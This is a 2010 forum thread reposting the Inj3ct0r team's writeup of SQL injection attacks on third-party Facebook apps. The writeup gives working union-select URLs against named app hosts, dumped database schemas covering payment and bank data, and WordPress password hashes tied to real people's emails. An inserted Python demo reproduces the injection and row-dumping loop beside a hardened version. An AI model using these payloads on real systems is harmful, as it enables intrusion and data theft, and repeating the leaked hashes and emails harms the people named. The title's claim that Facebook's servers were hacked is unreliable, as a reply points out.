El-Farhatz
Posts: 60 Join date: 20.03.10 Location: Bumi Allah
Subject: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! Tue Apr 06, 2010 8:09 pm
Assalamualaikum, afwan, I was searching for exploits again and came across an article like this from the inj3ct0r.com site. The exploit link is this: http://inj3ct0r.com/exploits/11638. If any of you brothers can explain this, please enlighten me. Wallahua'lam bisshowab ... I'm just a clueless newbie who can only copy and paste. Akhukumfillah El-Farhatz - Quote :
=================================================================
FaceBook's servers was hacked by Inj3ct0r team. Hack of the year!
=================================================================
Original: http://inj3ct0r.com/exploits/11638
[+] English translation
Inj3ct0r official website => Inj3ct0r.com
[0x00] [Introduction]
[0x01] [First impressions]
[0x02] [Search for bugs]
[0x03] [Inj3ct0r Crash Exploit]
[0x04] [Conclusion]
[0x05] [Greetz]
If you want to know the Inj3ct0r group, read: http://inj3ct0r.com/exploits/9845
[0x00] [Introduction]
+ [En] => In this log file you will read a limited version of the information gathered and provided, since the most important parts are being kept private in order to be analyzed by the proper authorities and close loopholes in the system.
We did not change the main page, we are not selling the server backup, and we did not delete files.
We have demonstrated the flaw in the system. Start =] ..
[0x01] [First impressions]
At first glance, FaceBook is a well protected social network. Scanning the FaceBook server did not give anything interesting ... )
..>
Initiating Parallel DNS resolution of 1 host.
Completed Parallel DNS resolution of 1 host.
Initiating SYN Stealth Scan
Scanning facebook.com (69.63.181.11) [1000 ports]
Discovered open port 443/tcp on 69.63.181.11
Discovered open port 80/tcp on 69.63.181.11
Completed SYN Stealth Scan 13.16s elapsed (1000 total ports)
Initiating Service scan
Scanning 2 services on facebook.com (69.63.181.11)
Service scan Timing: About 50.00% done; ETC:
Completed Service scan at 22:41, 104.15s elapsed (2 services on 1 host)
NSE: Script scanning 69.63.181.11.
NSE: Starting runlevel 1 (of 1) scan.
Initiating NSE at 22:41
Completed NSE at 22:41, 0.38s elapsed
NSE: Script Scanning completed.
Nmap scan report for facebook.com (69.63.181.11)
Host is up (0.17s latency).
Hostname facebook.com resolves to 4 IPs. Only scanned 69.63.181.11
rDNS record for 69.63.181.11: www-10-01-snc2.facebook.com
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http
443/tcp open ssl/https
go ahead .. =]
[0x02] [Search for bugs]
We use GoOgle.com
request: Facebook+Vulnerability [search]
We see a lot of different bugs / exploits / etc ... Mostly we see only XSS vulnerabilities,
but all this can be found by searching : http://inj3ct0r.com/search
All vulnerabilities are closed (nothing works ...). Let us go once again to GoOgle.com
request: site:facebook.com WARNING error
=\ *****...
Let us not lose heart) Hackers are not looking for easy ways
Visit Facebook.com
Let us search bugs in Web Apps.
https://www.facebook.com/robots.txt
oooooooooooooooooooooooooooo
User-agent: *
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: Slurp
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

User-agent: msnbot
Disallow: /ac.php
Disallow: /ae.php
Disallow: /album.php
Disallow: /ap.php
Disallow: /feeds/
Disallow: /p.php
Disallow: /photo.php
Disallow: /photo_comments.php
Disallow: /photo_search.php
Disallow: /photos.php

# E-mail webmaster@facebook.com and alex@facebook.com if you're authorized to access these, but getting denied.
Sitemap: https://www.facebook.com/sitemap.php
00000000000000000000000000000000
nothing interesting =\
https://apps.facebook.com/tvshowchat/
I looked closely, I noticed links
https://apps.facebook.com/tvshowchat/show.php?id=1 ... out of habit, I check the variable for vulnerability...
check:
https://apps.facebook.com/tvshowchat/show.php?id=inj3ct0r
ooooooooooooooooooooooooooo
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 28
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : SystemLiteral " or ' expected in /home/tomkincaid
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 1: parser error : Space required after the Public Identifier in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 164
and other....
oooooooooooooooooooooooooooo
O_o opsss! After sitting for a while, I realized that one of the servers is on MySql.
Writing exploits, I got the following: https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+@@version--+1
ooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </html> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
5.0.45-log <= ALERT!!!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log
super =] Now we can simply say that there is an SQL Injection Vulnerability
https://apps.facebook.com/tvshowchat/show.php?id=[SQL Injection Vulnerability]
Now we know that it is MySql 5.0.45-log
Then let's write another exploit to display tables with information_schema.tables:
https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+information_schema.tables--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: Invalid argument supplied for foreach() in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 38
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from information_schema.tables-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/
201 <= ALERT!!! 201 tables!
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
and other....
oooooooooooooooooooooooooooo
https://apps.facebook.com/observerfacebook/?p=challenges&id=[SQL INJ3ct0r]
Database : adminclt_testsite
Database User : adminclt_13@209.68.2.10
MySQL Version : 5.0.67-log
1) AdCode
2) AdTrack
3) Admin_DataStore
4) Admin_User
5) Challenges
6) ChallengesCompleted
7) Comments
8) ContactEmails
9) Content
10) ContentImages
11) FeaturedTemplate
12) FeaturedWidgets
13) Feeds
14) FolderLinks
15) Folders
16) ForumTopics
17) Log
18) LogDumps
19) Newswire
20) NotificationMessages
21) Notifications
22) Orders
23) OutboundMessages
24) Photos
25) Prizes
26) RawExtLinks
27) RawSessions
28) SessionLengths
29) Sites
30) Subscriptions
31) SurveyMonkeys
32) SystemStatus
33) Templates
34) User
35) UserBlogs
36) UserCollectives
37) UserInfo
38) UserInvites
39) Videos
40) WeeklyScores
41) Widgets
42) cronJobs
43) fbSessions
Admin_User
1) id
2) name
3) email
4) password
5) userid
6) ncUid
7) level
User
1) userid
2) ncUid
3) name
4) email
5) isAdmin
6) isBlocked
7) votePower
8) remoteStatus
9) isMember
10) isModerator
11) isSponsor
12) isEmailVerified
13) isResearcher
14) acceptRules
15) optInStudy
16) optInEmail
17) optInProfile
18) optInFeed
19) optInSMS
20) dateRegistered
21) eligibility
22) cachedPointTotal
23) cachedPointsEarned
24) cachedPointsEarnedThisWeek
25) cachedPointsEarnedLastWeek
26) cachedStoriesPosted
27) cachedCommentsPosted
28) userLevel
https://apps.facebook.com/ufundraise/fundraise.php?cid=[SQL INJ3CT0R]
Current Database : signalpa_fbmFundRraise
Database User : signalpa_rockaja@localhost
MySQL Version : 5.0.85-community
DATABASE
1) information_schema
2) signalpa_CelebrityPuzzle
3) signalpa_EBF
4) signalpa_appNotification
5) signalpa_appnetwork
6) signalpa_dailyscriptures
7) signalpa_ebayfeed
8) signalpa_fbmFundRraise
9) signalpa_fbmFundRraisebeta
10) signalpa_netcards
11) signalpa_paypal
12) signalpa_thepuzzle
signalpa_fbmFundRraise
1) Campaigns
2) Campaigns_Temp
3) FB_theme
4) IfundDollars
5) Languages
6) Payments
7) Paymentsoops
8) Supporters
9) Users
10) Withdrawals
11) invites
12) invites_copy
13) mp_passwords
14) payment_codes
15) txt_codes
16) valid_servers
17) weeklyBonus
[+] Column: Users
1) id
2) name
3) email
4) mobile_no
5) address
6) country
7) password
8) organisation
9) date_created
10) date_updated
11) status
12) facebook_id
13) isFacebookFan
14) verify
15) paypalUse
16) paypalEmail
17) bacUse
18) bacAcc
19) bacName
20) bacLocation
21) bacCountry
22) bacIBAN
23) bacSort_code
24) current_rank
25) new_rank
26) cronjob
27) max_fundraise
[+] Column: mp_passwords
1) id
2) password
3) username
4) status
5) number
6) rc
7) referer
8) transID
9) currency
10) transType
11) amount
12) confirmed
13) date
signalpa_paypal
1) paypal_cart_info
2) paypal_payment_info
3) paypal_subscription_info
Column: paypal_cart_info
1) txnid
2) itemname
3) itemnumber
4) os0
5) on0
6) os1
7) on1
8) quantity
9) invoice
10) custom
[+] Column : paypal_payment_info
1) firstname
2) lastname
3) buyer_email
4) street
5) city
6) state
7) zipcode
8) memo
9) itemname
10) itemnumber
11) os0
12) on0
13) os1
14) on1
15) quantity
16) paymentdate
17) paymenttype
18) txnid
19) mc_gross
20) mc_fee
21) paymentstatus
22) pendingreason
23) txntype
24) tax
25) mc_currency
26) reasoncode
27) custom
28) country
29) datecreation
https://apps.facebook.com/tvshowchat/show.php?id=[SQL INJ3CT0R]
Current Database : tv
Database User : tomkincaid@ps5008.dreamhost.com
MySQL Version : 5.0.45-log
[+] DATABASES
1) information_schema
2) astro
3) candukincaid
4) cemeteries
5) churchwpdb
6) countdownapp
7) crush
8) dare
9) friendiq
10) giants
11) hookup
12) jauntlet
13) loccus
14) luciacanduwp
15) maps
16) martisor
17) mediax
18) mostlikely
19) music
20) pimpfriends
21) plans
22) politicsapp
23) postergifts
24) posters2
25) projectbasecamp
26) pwnfriends
27) quiz
28) seeall
29) send
30) supporter
31) swapu
32) tomsapps
33) travelbug
[+] tab.send
1) app
2) item
3) itemforuser
4) neverblue
5) user
[+] Columns user(12454)
1) userid
2) siteid
3) appkey
4) session
5) points
6) added
7) removed
Tab. candukincaid
1) wp_comments
2) wp_links
3) wp_options
4) wp_post****
5) wp_posts
6) wp_px_albumPhotos
7) wp_px_albums
8) wp_px_galleries
9) wp_px_photos
10) wp_px_plugins
11) wp_term_relationships
12) wp_term_taxonomy
13) wp_terms
14) wp_user****
15) wp_users
[+]Column wp_users
1) ID
2) user_login
3) user_pass
4) user_nicename
5) user_email
6) user_url
7) user_registered
8) user_activation_key
9) user_status
10) display_name
etc...
I think we found a sufficient number of vulnerabilities!
[0x03] [Inj3ct0r Crash Exploit]
So .. moving on to the fun, friends
To avoid vandalism by script-kiddies I will not give you a link to shell.php, but I enclose images and some interesting queries =]
..> Inj3ct0rExploit start . + . + . + . + . + . + .
wp_posts
post_password
wp_users
user_pass
done.....
WordPress! oO one of the modules installed in facebook is Wordpress!
check link: https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+count(*)+from+candukincaid.wp_users--+1
oooooooooooooooooooooooooooo
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: </body> in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: ^ in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 7: parser error : Opening and ending tag mismatch: body line 3 and html in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 116
Warning: imagepng() [function.imagepng]: Unable to open '/home/tomkincaid/tomkincaid.dreamhosters.com/tv/badges/text/ /1 and 1=2 union select count(*) from candukincaid.wp_users-- 1.png' for writing: No such file or directory in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 67
3 <= ALERT! Users! =]
Warning: simplexml_load_string() [function.simplexml-load-string]: Entity: line 6: parser error : Opening and ending tag mismatch: hr line 5 and body in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/lib.php on line 123
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/tomkincaid/tomkincaid.dreamhosters.com/tv/show.php on line 124
oooooooooooooooooooooooooooo
..> Inj3ct0r_Crach_exploit [ENTER]
user:
admin:$P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/
lucia:$P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/
tom:$P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR.
cracker:
admin : $P$BDYUCMozJ/i3UEatmeECLxd3FTLqIe/ :admin:lcandu@yahoo.com
lucia : $P$BTlzOyWH5F7gdi42xVjtPMnBGDki1W/ :lucia:lcandu@yahoo.com
tom : $P$BkfTC.PaWW8alUSQd9j8PSUBG0LIiR. :tom:tom_kincaid@hotmail.com
see request:
https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws(0x3a,user_login,user_pass)+from+candukincaid.wp_users+limit+1--
https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+1,1--
https://apps.facebook.com/tvshowchat/show.php?id=1+and+1=2+union+select+concat_ws%280x3a,user_login,user_pass%29+from+candukincaid.wp_users+limit+2,1--
goOd =] Nice Hacking old school xD
[0x04] [Conclusion]
There's no 100% security! Be safe my friends! Watch for vulnerabilities and update promptly! Watch for updates on Inj3ct0r.com (Inj3ct0r Exploit Database)
[0x05] [Greetz]
Greetz to all members of Inj3ct0r.com
Friendly projects : Hack0wn.com , SecurityVulns.com, SecurityHome.eu, Xiya.org, Packetstormsecurity.org, exploit-db.com, MorningStarSecurity.com..... we have many friends)) Go http://inj3ct0r.com/links =]
Personally:
0x1D, Z0m[b]!e, w01f, cr4wl3r (http://shell4u.oni.cc/), Phenom, bL4Ck_3n91n3, JosS (http://hack0wn.com/), eidelweiss, Farzin0123(Pianist), Th3 RDX,
Andrew Horton ... You are good hackers. Respect y0u!
Farzin0123(Pianist) visit site : Ueg88.blogfa.com ! Thank you for pushing me to write this article, and for reporting the dependence! Personal Respect to you from Inj3ct0r Team!
At the time of publication, all requests work! Attached images : inj3ct0r.com/facebook.zip
We want to thank the following people for their contribution.
Do not forget to keep track of vulnerabilities in Inj3ct0r.com
GoOd luck Hackers! =]
# Inj3ct0r.com [2010-04-06]
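The injection walk in the quoted writeup (a non-numeric id producing a mysql_fetch_array warning, union select @@version, count(*) from information_schema.tables, then one wp_users row per request with limit N,1), reproduced as an added example that is not part of the original post or of the Inj3ct0r article. SQLite stands in for the MySQL 5.0 backend, so sqlite_version() replaces @@version, sqlite_master replaces information_schema.tables and || replaces concat_ws; the shows and wp_users tables, their rows and the $P$B... hash placeholders are constructed for the demo, and show_vulnerable / show_hardened are hypothetical stand-ins for show.php, not code from that app.

```python
"""Union-based SQL injection: a show.php-style lookup beside a hardened one.

Added example, not code from the Inj3ct0r writeup or from any app it names.
SQLite stands in for the MySQL 5.0 backend described on the page:
sqlite_version() plays @@version, sqlite_master plays information_schema.tables.
All tables, rows and the $P$B... hash placeholders are constructed for the demo.
"""
import sqlite3


def make_db():
    """In-memory stand-in for the app's database (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE shows (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO shows VALUES (1, 'Lost'), (2, 'Heroes');
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_pass TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '$P$Bexample1'),
                                    (2, 'lucia', '$P$Bexample2');
        """
    )
    return conn


def show_vulnerable(conn, raw_id):
    """Hypothetical mirror of show.php?id=: the parameter is pasted into the SQL.

    A failed query comes back as an error string, the counterpart of the
    'supplied argument is not a valid MySQL result resource' warning that
    gave the injection point away in the writeup.
    """
    sql = "SELECT title FROM shows WHERE id=" + raw_id
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "error: " + str(exc)


def show_hardened(conn, raw_id):
    """Same lookup with the id handled as data: cast it, then bind it."""
    try:
        show_id = int(raw_id)  # anything that is not an integer id is rejected
    except ValueError:
        return []
    cur = conn.execute("SELECT title FROM shows WHERE id=?", (show_id,))
    return [row[0] for row in cur]


# Payloads in the shape the writeup used: 'and 1=2' empties the real result,
# the one-column UNION SELECT supplies the value that gets rendered in place
# of the show title, and '-- ' comments out whatever followed the id.
VERSION_PAYLOAD = "1 and 1=2 union select sqlite_version()-- 1"
TABLE_COUNT_PAYLOAD = (
    "1 and 1=2 union select count(*) from sqlite_master where type='table'-- 1"
)


def dump_rows(conn, table, expr):
    """Generalises the writeup's limit 1 / limit 1,1 / limit 2,1 sequence:
    fetch one row per request until the UNION has nothing left."""
    rows = []
    offset = 0
    while True:
        payload = "1 and 1=2 union select %s from %s limit %d,1-- 1" % (expr, table, offset)
        got = show_vulnerable(conn, payload)
        if not got or isinstance(got, str):  # empty result or query error: stop
            return rows
        rows.append(got[0])
        offset += 1


def db_version():
    """Library version string, to check what VERSION_PAYLOAD leaks."""
    return sqlite3.sqlite_version


def demo_results():
    """Run every probe against a fresh database and collect the outcomes."""
    db = make_db()
    return {
        "probe": show_vulnerable(db, "inj3ct0r"),          # error: the tell-tale
        "version": show_vulnerable(db, VERSION_PAYLOAD),   # DB version leaks
        "tables": show_vulnerable(db, TABLE_COUNT_PAYLOAD),
        "users": dump_rows(db, "wp_users", "user_login || ':' || user_pass"),
        "hardened": show_hardened(db, VERSION_PAYLOAD),    # [] : payload inert
        "normal": show_hardened(db, "1"),                  # ['Lost']
    }


if __name__ == "__main__":
    for name, value in demo_results().items():
        print(name, "->", value)
```

Run it directly to see each probe's outcome. The two measures in show_hardened are independent: binding the id with a placeholder already makes every payload inert, and the integer cast additionally turns the probe that produced the mysql_fetch_array warning into a clean empty answer instead of a stack of PHP warnings leaking /home/tomkincaid/... paths; switching display_errors off in production removes that second signal as well.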
cyberkalashnikov
Posts: 118 Join date: 07.01.10 Location: /bin/bash
Subject: Re: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! Thu Apr 08, 2010 7:30 am
Looks like it's only applications, bro... not the facebook server itself...
El-Farhatz
Posts: 60 Join date: 20.03.10 Location: Bumi Allah
Subject: Re: FaceBook's servers was hacked by Inj3ct0r team. Hack of the year! Thu Apr 08, 2010 11:04 am
hmmph.... yes, akh. I don't get it. Jazakallah for the info. Akhukumfillah El-Farhatz